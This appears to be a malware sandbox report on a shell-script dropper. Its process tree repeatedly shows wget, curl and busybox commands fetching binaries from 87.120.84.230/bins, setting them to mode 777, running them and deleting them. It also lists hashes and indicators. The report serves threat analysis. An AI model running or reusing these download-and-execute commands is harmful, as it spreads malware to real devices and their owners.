Analysis
-
max time kernel
64s -
max time network
66s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240611-en -
resource tags
arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
01-11-2024 03:33
Static task
static1
Behavioral task
behavioral1
Sample
4c60fa2eae641103e8c18fec6273816c01db116510c35494e1c5461391e5dcd8.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
4c60fa2eae641103e8c18fec6273816c01db116510c35494e1c5461391e5dcd8.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
4c60fa2eae641103e8c18fec6273816c01db116510c35494e1c5461391e5dcd8.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
4c60fa2eae641103e8c18fec6273816c01db116510c35494e1c5461391e5dcd8.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
4c60fa2eae641103e8c18fec6273816c01db116510c35494e1c5461391e5dcd8.sh
-
Size
10KB
-
MD5
01b56d1b9cc005de6042881dafcef1bf
-
SHA1
37f98670c045d4e2627287b76bed156bae8d9a10
-
SHA256
4c60fa2eae641103e8c18fec6273816c01db116510c35494e1c5461391e5dcd8
-
SHA512
617294ee58e825e6af28f02ab893ca33b04be9f8b1154d6f335a5b8085e2706046661ab704c92730764d6e1b132af69593e9d054e4fe2a31c9aa326ab52f6ac2
-
SSDEEP
192:qfHqRU7VKbQJxAcqZdGhBu4pHZdGhBNTfHqTY9JxAcp:pS7VKblKLs9
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 820 chmod 871 chmod 919 chmod 925 chmod 961 chmod 813 chmod 757 chmod 913 chmod 949 chmod 751 chmod 985 chmod 889 chmod 955 chmod 967 chmod 979 chmod 901 chmod 931 chmod 895 chmod 907 chmod 943 chmod 973 chmod 883 chmod 854 chmod 877 chmod 745 chmod 826 chmod 937 chmod 785 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/SzsXabqeIZ2BtUxxHhZOhZOMFsurjljyQ8 746 SzsXabqeIZ2BtUxxHhZOhZOMFsurjljyQ8 /tmp/j6AVAMaOngkD5kSxEbQdPJeOG9n9VEyOkR 752 j6AVAMaOngkD5kSxEbQdPJeOG9n9VEyOkR /tmp/nRtF0JMF5l1If3vwcSPlBIe7CRUTD9bRTX 758 nRtF0JMF5l1If3vwcSPlBIe7CRUTD9bRTX /tmp/UA6bc9cD11v7hnvPrgpQ9KwsP8LiauBPC6 786 UA6bc9cD11v7hnvPrgpQ9KwsP8LiauBPC6 /tmp/rmedDNaZWnAAKGCL99nsOVsR0T2cOALswO 814 rmedDNaZWnAAKGCL99nsOVsR0T2cOALswO /tmp/vExDvpG3t84g9wf0sHWI2dVd8Sz6IAKsYx 821 vExDvpG3t84g9wf0sHWI2dVd8Sz6IAKsYx /tmp/DTuId2Cu0wiso5Bs88TTfo7DNxaIXwHOlm 828 DTuId2Cu0wiso5Bs88TTfo7DNxaIXwHOlm /tmp/aW7aG8a7OtOJbmN8O3EVRo0BmwFFcXrRWd 855 aW7aG8a7OtOJbmN8O3EVRo0BmwFFcXrRWd /tmp/TG3A2xjIGk8PWwrKi9yghpVIaZbzJuV6Tf 872 TG3A2xjIGk8PWwrKi9yghpVIaZbzJuV6Tf /tmp/JVIdHrYEvGMdZ00eGrb8zITfM1NNUWibDR 878 JVIdHrYEvGMdZ00eGrb8zITfM1NNUWibDR /tmp/yi9OMLXy50JsPYzex2KzU50mKnzgWlS5jK 884 yi9OMLXy50JsPYzex2KzU50mKnzgWlS5jK /tmp/jc8PQuWtX4SmXjsM6uzWFfZcNgBUpAn1hk 890 jc8PQuWtX4SmXjsM6uzWFfZcNgBUpAn1hk /tmp/ymOJKI6e54s7cAI21O69RLnCAHtK57R3Hm 896 ymOJKI6e54s7cAI21O69RLnCAHtK57R3Hm /tmp/YBFl2bsRNkNwDnbK1CbwImsnlNNpcffAXt 902 YBFl2bsRNkNwDnbK1CbwImsnlNNpcffAXt /tmp/TG3A2xjIGk8PWwrKi9yghpVIaZbzJuV6Tf 908 TG3A2xjIGk8PWwrKi9yghpVIaZbzJuV6Tf /tmp/JVIdHrYEvGMdZ00eGrb8zITfM1NNUWibDR 914 JVIdHrYEvGMdZ00eGrb8zITfM1NNUWibDR /tmp/yi9OMLXy50JsPYzex2KzU50mKnzgWlS5jK 920 yi9OMLXy50JsPYzex2KzU50mKnzgWlS5jK /tmp/jc8PQuWtX4SmXjsM6uzWFfZcNgBUpAn1hk 926 jc8PQuWtX4SmXjsM6uzWFfZcNgBUpAn1hk /tmp/ymOJKI6e54s7cAI21O69RLnCAHtK57R3Hm 932 ymOJKI6e54s7cAI21O69RLnCAHtK57R3Hm /tmp/YBFl2bsRNkNwDnbK1CbwImsnlNNpcffAXt 938 YBFl2bsRNkNwDnbK1CbwImsnlNNpcffAXt /tmp/rmedDNaZWnAAKGCL99nsOVsR0T2cOALswO 944 rmedDNaZWnAAKGCL99nsOVsR0T2cOALswO /tmp/SzsXabqeIZ2BtUxxHhZOhZOMFsurjljyQ8 950 SzsXabqeIZ2BtUxxHhZOhZOMFsurjljyQ8 /tmp/j6AVAMaOngkD5kSxEbQdPJeOG9n9VEyOkR 956 j6AVAMaOngkD5kSxEbQdPJeOG9n9VEyOkR /tmp/nRtF0JMF5l1If3vwcSPlBIe7CRUTD9bRTX 962 nRtF0JMF5l1If3vwcSPlBIe7CRUTD9bRTX /tmp/UA6bc9cD11v7hnvPrgpQ9KwsP8LiauBPC6 968 UA6bc9cD11v7hnvPrgpQ9KwsP8LiauBPC6 /tmp/vExDvpG3t84g9wf0sHWI2dVd8Sz6IAKsYx 974 vExDvpG3t84g9wf0sHWI2dVd8Sz6IAKsYx /tmp/DTuId2Cu0wiso5Bs88TTfo7DNxaIXwHOlm 980 DTuId2Cu0wiso5Bs88TTfo7DNxaIXwHOlm /tmp/aW7aG8a7OtOJbmN8O3EVRo0BmwFFcXrRWd 986 aW7aG8a7OtOJbmN8O3EVRo0BmwFFcXrRWd -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/YBFl2bsRNkNwDnbK1CbwImsnlNNpcffAXt curl File opened for modification /tmp/yi9OMLXy50JsPYzex2KzU50mKnzgWlS5jK curl File opened for modification /tmp/UA6bc9cD11v7hnvPrgpQ9KwsP8LiauBPC6 curl File opened for modification /tmp/vExDvpG3t84g9wf0sHWI2dVd8Sz6IAKsYx curl File opened for modification /tmp/nRtF0JMF5l1If3vwcSPlBIe7CRUTD9bRTX curl File opened for modification /tmp/TG3A2xjIGk8PWwrKi9yghpVIaZbzJuV6Tf curl File opened for modification /tmp/j6AVAMaOngkD5kSxEbQdPJeOG9n9VEyOkR curl File opened for modification /tmp/rmedDNaZWnAAKGCL99nsOVsR0T2cOALswO curl File opened for modification /tmp/SzsXabqeIZ2BtUxxHhZOhZOMFsurjljyQ8 curl File opened for modification /tmp/SzsXabqeIZ2BtUxxHhZOhZOMFsurjljyQ8 curl File opened for modification /tmp/jc8PQuWtX4SmXjsM6uzWFfZcNgBUpAn1hk curl File opened for modification /tmp/jc8PQuWtX4SmXjsM6uzWFfZcNgBUpAn1hk curl File opened for modification /tmp/j6AVAMaOngkD5kSxEbQdPJeOG9n9VEyOkR curl File opened for modification /tmp/DTuId2Cu0wiso5Bs88TTfo7DNxaIXwHOlm curl File opened for modification /tmp/TG3A2xjIGk8PWwrKi9yghpVIaZbzJuV6Tf curl File opened for modification /tmp/ymOJKI6e54s7cAI21O69RLnCAHtK57R3Hm curl File opened for modification /tmp/rmedDNaZWnAAKGCL99nsOVsR0T2cOALswO curl File opened for modification /tmp/yi9OMLXy50JsPYzex2KzU50mKnzgWlS5jK curl File opened for modification /tmp/JVIdHrYEvGMdZ00eGrb8zITfM1NNUWibDR curl File opened for modification /tmp/ymOJKI6e54s7cAI21O69RLnCAHtK57R3Hm curl File opened for modification /tmp/YBFl2bsRNkNwDnbK1CbwImsnlNNpcffAXt curl File opened for modification /tmp/vExDvpG3t84g9wf0sHWI2dVd8Sz6IAKsYx curl File opened for modification /tmp/aW7aG8a7OtOJbmN8O3EVRo0BmwFFcXrRWd curl File opened for modification /tmp/JVIdHrYEvGMdZ00eGrb8zITfM1NNUWibDR curl File opened for modification /tmp/nRtF0JMF5l1If3vwcSPlBIe7CRUTD9bRTX curl File opened for modification /tmp/UA6bc9cD11v7hnvPrgpQ9KwsP8LiauBPC6 curl File opened for modification /tmp/DTuId2Cu0wiso5Bs88TTfo7DNxaIXwHOlm curl File opened for modification /tmp/aW7aG8a7OtOJbmN8O3EVRo0BmwFFcXrRWd curl
Processes
-
/tmp/4c60fa2eae641103e8c18fec6273816c01db116510c35494e1c5461391e5dcd8.sh/tmp/4c60fa2eae641103e8c18fec6273816c01db116510c35494e1c5461391e5dcd8.sh1⤵PID:713
-
/bin/rm/bin/rm bins.sh2⤵PID:716
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/SzsXabqeIZ2BtUxxHhZOhZOMFsurjljyQ82⤵PID:721
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/SzsXabqeIZ2BtUxxHhZOhZOMFsurjljyQ82⤵
- Reads runtime system information
- Writes file to tmp directory
PID:736
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/SzsXabqeIZ2BtUxxHhZOhZOMFsurjljyQ82⤵PID:743
-
-
/bin/chmodchmod 777 SzsXabqeIZ2BtUxxHhZOhZOMFsurjljyQ82⤵
- File and Directory Permissions Modification
PID:745
-
-
/tmp/SzsXabqeIZ2BtUxxHhZOhZOMFsurjljyQ8./SzsXabqeIZ2BtUxxHhZOhZOMFsurjljyQ82⤵
- Executes dropped EXE
PID:746
-
-
/bin/rmrm SzsXabqeIZ2BtUxxHhZOhZOMFsurjljyQ82⤵PID:747
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/j6AVAMaOngkD5kSxEbQdPJeOG9n9VEyOkR2⤵PID:748
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/j6AVAMaOngkD5kSxEbQdPJeOG9n9VEyOkR2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:749
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/j6AVAMaOngkD5kSxEbQdPJeOG9n9VEyOkR2⤵PID:750
-
-
/bin/chmodchmod 777 j6AVAMaOngkD5kSxEbQdPJeOG9n9VEyOkR2⤵
- File and Directory Permissions Modification
PID:751
-
-
/tmp/j6AVAMaOngkD5kSxEbQdPJeOG9n9VEyOkR./j6AVAMaOngkD5kSxEbQdPJeOG9n9VEyOkR2⤵
- Executes dropped EXE
PID:752
-
-
/bin/rmrm j6AVAMaOngkD5kSxEbQdPJeOG9n9VEyOkR2⤵PID:753
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/nRtF0JMF5l1If3vwcSPlBIe7CRUTD9bRTX2⤵PID:754
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/nRtF0JMF5l1If3vwcSPlBIe7CRUTD9bRTX2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:755
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/nRtF0JMF5l1If3vwcSPlBIe7CRUTD9bRTX2⤵PID:756
-
-
/bin/chmodchmod 777 nRtF0JMF5l1If3vwcSPlBIe7CRUTD9bRTX2⤵
- File and Directory Permissions Modification
PID:757
-
-
/tmp/nRtF0JMF5l1If3vwcSPlBIe7CRUTD9bRTX./nRtF0JMF5l1If3vwcSPlBIe7CRUTD9bRTX2⤵
- Executes dropped EXE
PID:758
-
-
/bin/rmrm nRtF0JMF5l1If3vwcSPlBIe7CRUTD9bRTX2⤵PID:761
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/UA6bc9cD11v7hnvPrgpQ9KwsP8LiauBPC62⤵PID:762
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/UA6bc9cD11v7hnvPrgpQ9KwsP8LiauBPC62⤵
- Reads runtime system information
- Writes file to tmp directory
PID:769
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/UA6bc9cD11v7hnvPrgpQ9KwsP8LiauBPC62⤵PID:779
-
-
/bin/chmodchmod 777 UA6bc9cD11v7hnvPrgpQ9KwsP8LiauBPC62⤵
- File and Directory Permissions Modification
PID:785
-
-
/tmp/UA6bc9cD11v7hnvPrgpQ9KwsP8LiauBPC6./UA6bc9cD11v7hnvPrgpQ9KwsP8LiauBPC62⤵
- Executes dropped EXE
PID:786
-
-
/bin/rmrm UA6bc9cD11v7hnvPrgpQ9KwsP8LiauBPC62⤵PID:789
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/rmedDNaZWnAAKGCL99nsOVsR0T2cOALswO2⤵PID:791
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/rmedDNaZWnAAKGCL99nsOVsR0T2cOALswO2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:798
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/rmedDNaZWnAAKGCL99nsOVsR0T2cOALswO2⤵PID:808
-
-
/bin/chmodchmod 777 rmedDNaZWnAAKGCL99nsOVsR0T2cOALswO2⤵
- File and Directory Permissions Modification
PID:813
-
-
/tmp/rmedDNaZWnAAKGCL99nsOVsR0T2cOALswO./rmedDNaZWnAAKGCL99nsOVsR0T2cOALswO2⤵
- Executes dropped EXE
PID:814
-
-
/bin/rmrm rmedDNaZWnAAKGCL99nsOVsR0T2cOALswO2⤵PID:816
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/vExDvpG3t84g9wf0sHWI2dVd8Sz6IAKsYx2⤵PID:817
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/vExDvpG3t84g9wf0sHWI2dVd8Sz6IAKsYx2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:818
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/vExDvpG3t84g9wf0sHWI2dVd8Sz6IAKsYx2⤵PID:819
-
-
/bin/chmodchmod 777 vExDvpG3t84g9wf0sHWI2dVd8Sz6IAKsYx2⤵
- File and Directory Permissions Modification
PID:820
-
-
/tmp/vExDvpG3t84g9wf0sHWI2dVd8Sz6IAKsYx./vExDvpG3t84g9wf0sHWI2dVd8Sz6IAKsYx2⤵
- Executes dropped EXE
PID:821
-
-
/bin/rmrm vExDvpG3t84g9wf0sHWI2dVd8Sz6IAKsYx2⤵PID:822
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/DTuId2Cu0wiso5Bs88TTfo7DNxaIXwHOlm2⤵PID:823
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/DTuId2Cu0wiso5Bs88TTfo7DNxaIXwHOlm2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:824
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/DTuId2Cu0wiso5Bs88TTfo7DNxaIXwHOlm2⤵PID:825
-
-
/bin/chmodchmod 777 DTuId2Cu0wiso5Bs88TTfo7DNxaIXwHOlm2⤵
- File and Directory Permissions Modification
PID:826
-
-
/tmp/DTuId2Cu0wiso5Bs88TTfo7DNxaIXwHOlm./DTuId2Cu0wiso5Bs88TTfo7DNxaIXwHOlm2⤵
- Executes dropped EXE
PID:828
-
-
/bin/rmrm DTuId2Cu0wiso5Bs88TTfo7DNxaIXwHOlm2⤵PID:831
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/aW7aG8a7OtOJbmN8O3EVRo0BmwFFcXrRWd2⤵PID:833
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/aW7aG8a7OtOJbmN8O3EVRo0BmwFFcXrRWd2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:840
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/aW7aG8a7OtOJbmN8O3EVRo0BmwFFcXrRWd2⤵PID:849
-
-
/bin/chmodchmod 777 aW7aG8a7OtOJbmN8O3EVRo0BmwFFcXrRWd2⤵
- File and Directory Permissions Modification
PID:854
-
-
/tmp/aW7aG8a7OtOJbmN8O3EVRo0BmwFFcXrRWd./aW7aG8a7OtOJbmN8O3EVRo0BmwFFcXrRWd2⤵
- Executes dropped EXE
PID:855
-
-
/bin/rmrm aW7aG8a7OtOJbmN8O3EVRo0BmwFFcXrRWd2⤵PID:858
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/TG3A2xjIGk8PWwrKi9yghpVIaZbzJuV6Tf2⤵PID:859
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/TG3A2xjIGk8PWwrKi9yghpVIaZbzJuV6Tf2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:868
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/TG3A2xjIGk8PWwrKi9yghpVIaZbzJuV6Tf2⤵PID:870
-
-
/bin/chmodchmod 777 TG3A2xjIGk8PWwrKi9yghpVIaZbzJuV6Tf2⤵
- File and Directory Permissions Modification
PID:871
-
-
/tmp/TG3A2xjIGk8PWwrKi9yghpVIaZbzJuV6Tf./TG3A2xjIGk8PWwrKi9yghpVIaZbzJuV6Tf2⤵
- Executes dropped EXE
PID:872
-
-
/bin/rmrm TG3A2xjIGk8PWwrKi9yghpVIaZbzJuV6Tf2⤵PID:873
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/JVIdHrYEvGMdZ00eGrb8zITfM1NNUWibDR2⤵PID:874
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/JVIdHrYEvGMdZ00eGrb8zITfM1NNUWibDR2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:875
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/JVIdHrYEvGMdZ00eGrb8zITfM1NNUWibDR2⤵PID:876
-
-
/bin/chmodchmod 777 JVIdHrYEvGMdZ00eGrb8zITfM1NNUWibDR2⤵
- File and Directory Permissions Modification
PID:877
-
-
/tmp/JVIdHrYEvGMdZ00eGrb8zITfM1NNUWibDR./JVIdHrYEvGMdZ00eGrb8zITfM1NNUWibDR2⤵
- Executes dropped EXE
PID:878
-
-
/bin/rmrm JVIdHrYEvGMdZ00eGrb8zITfM1NNUWibDR2⤵PID:879
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/yi9OMLXy50JsPYzex2KzU50mKnzgWlS5jK2⤵PID:880
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/yi9OMLXy50JsPYzex2KzU50mKnzgWlS5jK2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:881
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/yi9OMLXy50JsPYzex2KzU50mKnzgWlS5jK2⤵PID:882
-
-
/bin/chmodchmod 777 yi9OMLXy50JsPYzex2KzU50mKnzgWlS5jK2⤵
- File and Directory Permissions Modification
PID:883
-
-
/tmp/yi9OMLXy50JsPYzex2KzU50mKnzgWlS5jK./yi9OMLXy50JsPYzex2KzU50mKnzgWlS5jK2⤵
- Executes dropped EXE
PID:884
-
-
/bin/rmrm yi9OMLXy50JsPYzex2KzU50mKnzgWlS5jK2⤵PID:885
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/jc8PQuWtX4SmXjsM6uzWFfZcNgBUpAn1hk2⤵PID:886
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/jc8PQuWtX4SmXjsM6uzWFfZcNgBUpAn1hk2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:887
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/jc8PQuWtX4SmXjsM6uzWFfZcNgBUpAn1hk2⤵PID:888
-
-
/bin/chmodchmod 777 jc8PQuWtX4SmXjsM6uzWFfZcNgBUpAn1hk2⤵
- File and Directory Permissions Modification
PID:889
-
-
/tmp/jc8PQuWtX4SmXjsM6uzWFfZcNgBUpAn1hk./jc8PQuWtX4SmXjsM6uzWFfZcNgBUpAn1hk2⤵
- Executes dropped EXE
PID:890
-
-
/bin/rmrm jc8PQuWtX4SmXjsM6uzWFfZcNgBUpAn1hk2⤵PID:891
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/ymOJKI6e54s7cAI21O69RLnCAHtK57R3Hm2⤵PID:892
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/ymOJKI6e54s7cAI21O69RLnCAHtK57R3Hm2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:893
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/ymOJKI6e54s7cAI21O69RLnCAHtK57R3Hm2⤵PID:894
-
-
/bin/chmodchmod 777 ymOJKI6e54s7cAI21O69RLnCAHtK57R3Hm2⤵
- File and Directory Permissions Modification
PID:895
-
-
/tmp/ymOJKI6e54s7cAI21O69RLnCAHtK57R3Hm./ymOJKI6e54s7cAI21O69RLnCAHtK57R3Hm2⤵
- Executes dropped EXE
PID:896
-
-
/bin/rmrm ymOJKI6e54s7cAI21O69RLnCAHtK57R3Hm2⤵PID:897
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/YBFl2bsRNkNwDnbK1CbwImsnlNNpcffAXt2⤵PID:898
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/YBFl2bsRNkNwDnbK1CbwImsnlNNpcffAXt2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:899
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/YBFl2bsRNkNwDnbK1CbwImsnlNNpcffAXt2⤵PID:900
-
-
/bin/chmodchmod 777 YBFl2bsRNkNwDnbK1CbwImsnlNNpcffAXt2⤵
- File and Directory Permissions Modification
PID:901
-
-
/tmp/YBFl2bsRNkNwDnbK1CbwImsnlNNpcffAXt./YBFl2bsRNkNwDnbK1CbwImsnlNNpcffAXt2⤵
- Executes dropped EXE
PID:902
-
-
/bin/rmrm YBFl2bsRNkNwDnbK1CbwImsnlNNpcffAXt2⤵PID:903
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/TG3A2xjIGk8PWwrKi9yghpVIaZbzJuV6Tf2⤵PID:904
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/TG3A2xjIGk8PWwrKi9yghpVIaZbzJuV6Tf2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:905
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/TG3A2xjIGk8PWwrKi9yghpVIaZbzJuV6Tf2⤵PID:906
-
-
/bin/chmodchmod 777 TG3A2xjIGk8PWwrKi9yghpVIaZbzJuV6Tf2⤵
- File and Directory Permissions Modification
PID:907
-
-
/tmp/TG3A2xjIGk8PWwrKi9yghpVIaZbzJuV6Tf./TG3A2xjIGk8PWwrKi9yghpVIaZbzJuV6Tf2⤵
- Executes dropped EXE
PID:908
-
-
/bin/rmrm TG3A2xjIGk8PWwrKi9yghpVIaZbzJuV6Tf2⤵PID:909
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/JVIdHrYEvGMdZ00eGrb8zITfM1NNUWibDR2⤵PID:910
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/JVIdHrYEvGMdZ00eGrb8zITfM1NNUWibDR2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:911
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/JVIdHrYEvGMdZ00eGrb8zITfM1NNUWibDR2⤵PID:912
-
-
/bin/chmodchmod 777 JVIdHrYEvGMdZ00eGrb8zITfM1NNUWibDR2⤵
- File and Directory Permissions Modification
PID:913
-
-
/tmp/JVIdHrYEvGMdZ00eGrb8zITfM1NNUWibDR./JVIdHrYEvGMdZ00eGrb8zITfM1NNUWibDR2⤵
- Executes dropped EXE
PID:914
-
-
/bin/rmrm JVIdHrYEvGMdZ00eGrb8zITfM1NNUWibDR2⤵PID:915
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/yi9OMLXy50JsPYzex2KzU50mKnzgWlS5jK2⤵PID:916
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/yi9OMLXy50JsPYzex2KzU50mKnzgWlS5jK2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:917
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/yi9OMLXy50JsPYzex2KzU50mKnzgWlS5jK2⤵PID:918
-
-
/bin/chmodchmod 777 yi9OMLXy50JsPYzex2KzU50mKnzgWlS5jK2⤵
- File and Directory Permissions Modification
PID:919
-
-
/tmp/yi9OMLXy50JsPYzex2KzU50mKnzgWlS5jK./yi9OMLXy50JsPYzex2KzU50mKnzgWlS5jK2⤵
- Executes dropped EXE
PID:920
-
-
/bin/rmrm yi9OMLXy50JsPYzex2KzU50mKnzgWlS5jK2⤵PID:921
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/jc8PQuWtX4SmXjsM6uzWFfZcNgBUpAn1hk2⤵PID:922
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/jc8PQuWtX4SmXjsM6uzWFfZcNgBUpAn1hk2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:923
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/jc8PQuWtX4SmXjsM6uzWFfZcNgBUpAn1hk2⤵PID:924
-
-
/bin/chmodchmod 777 jc8PQuWtX4SmXjsM6uzWFfZcNgBUpAn1hk2⤵
- File and Directory Permissions Modification
PID:925
-
-
/tmp/jc8PQuWtX4SmXjsM6uzWFfZcNgBUpAn1hk./jc8PQuWtX4SmXjsM6uzWFfZcNgBUpAn1hk2⤵
- Executes dropped EXE
PID:926
-
-
/bin/rmrm jc8PQuWtX4SmXjsM6uzWFfZcNgBUpAn1hk2⤵PID:927
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/ymOJKI6e54s7cAI21O69RLnCAHtK57R3Hm2⤵PID:928
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/ymOJKI6e54s7cAI21O69RLnCAHtK57R3Hm2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:929
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/ymOJKI6e54s7cAI21O69RLnCAHtK57R3Hm2⤵PID:930
-
-
/bin/chmodchmod 777 ymOJKI6e54s7cAI21O69RLnCAHtK57R3Hm2⤵
- File and Directory Permissions Modification
PID:931
-
-
/tmp/ymOJKI6e54s7cAI21O69RLnCAHtK57R3Hm./ymOJKI6e54s7cAI21O69RLnCAHtK57R3Hm2⤵
- Executes dropped EXE
PID:932
-
-
/bin/rmrm ymOJKI6e54s7cAI21O69RLnCAHtK57R3Hm2⤵PID:933
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/YBFl2bsRNkNwDnbK1CbwImsnlNNpcffAXt2⤵PID:934
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/YBFl2bsRNkNwDnbK1CbwImsnlNNpcffAXt2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:935
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/YBFl2bsRNkNwDnbK1CbwImsnlNNpcffAXt2⤵PID:936
-
-
/bin/chmodchmod 777 YBFl2bsRNkNwDnbK1CbwImsnlNNpcffAXt2⤵
- File and Directory Permissions Modification
PID:937
-
-
/tmp/YBFl2bsRNkNwDnbK1CbwImsnlNNpcffAXt./YBFl2bsRNkNwDnbK1CbwImsnlNNpcffAXt2⤵
- Executes dropped EXE
PID:938
-
-
/bin/rmrm YBFl2bsRNkNwDnbK1CbwImsnlNNpcffAXt2⤵PID:939
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/rmedDNaZWnAAKGCL99nsOVsR0T2cOALswO2⤵PID:940
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/rmedDNaZWnAAKGCL99nsOVsR0T2cOALswO2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:941
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/rmedDNaZWnAAKGCL99nsOVsR0T2cOALswO2⤵PID:942
-
-
/bin/chmodchmod 777 rmedDNaZWnAAKGCL99nsOVsR0T2cOALswO2⤵
- File and Directory Permissions Modification
PID:943
-
-
/tmp/rmedDNaZWnAAKGCL99nsOVsR0T2cOALswO./rmedDNaZWnAAKGCL99nsOVsR0T2cOALswO2⤵
- Executes dropped EXE
PID:944
-
-
/bin/rmrm rmedDNaZWnAAKGCL99nsOVsR0T2cOALswO2⤵PID:945
-
-
